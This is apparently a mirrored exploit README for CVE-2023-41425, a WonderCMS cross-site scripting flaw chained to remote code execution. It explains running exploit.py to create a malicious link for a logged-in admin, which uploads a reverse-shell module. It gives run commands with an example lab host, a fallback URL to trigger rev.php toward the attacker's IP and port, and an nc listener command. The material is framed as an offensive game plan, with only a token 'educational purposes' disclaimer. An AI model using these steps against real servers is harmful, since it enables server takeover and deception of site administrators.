## https://sploitus.com/exploit?id=2F4E3DBE-F5A4-5CC2-9DED-5A6FC9264EA6
# CVE-2023-41425-WonderCMS-Authenticated-RCE
## Description
WonderCMS v3.2.0 - v3.4.2 is vulnerable. Remote attackers can take full control of the server using a Cross-Site Scripting (XSS) exploit (For educational purposes only ). Here's the game plan:
## How it works:
The exploit abuses the installModule component of WonderCMS to sneak a crafted script that runs arbitrary code.
## The Setup
* Tool: exploit.py
* What You Need:
- Target URL where WonderCMS is installed (no admin password required).
- Your attacker's machine IP.
- A port for your reverse shell listener.
## Step-by-Step Execution
1. The script generates a file called xss.js. This JavaScript weapon is designed to exploit reflected XSS.
2. It spits out a malicious link. You’ll send that to the admin.
3. The magic happens when the admin (a logged-in user) opens or clicks your link:
- Background requests fire without their consent.
- A reverse shell payload is uploaded using the theme/plugin upload feature.
4. Once uploaded, the payload executes and grants you a reverse shell connection straight to the target server.
```sh
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
```
Example
```sh
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
```
## Fail-Safe:
If the reverse shell doesn’t trigger automatically, just head over to:
```sh
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
```
## note:
Remember start a listener using the following command:
```sh
nc -lvp 4444
```
## Credit
prodigiousMind for discovering and reporting the vulnerability https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413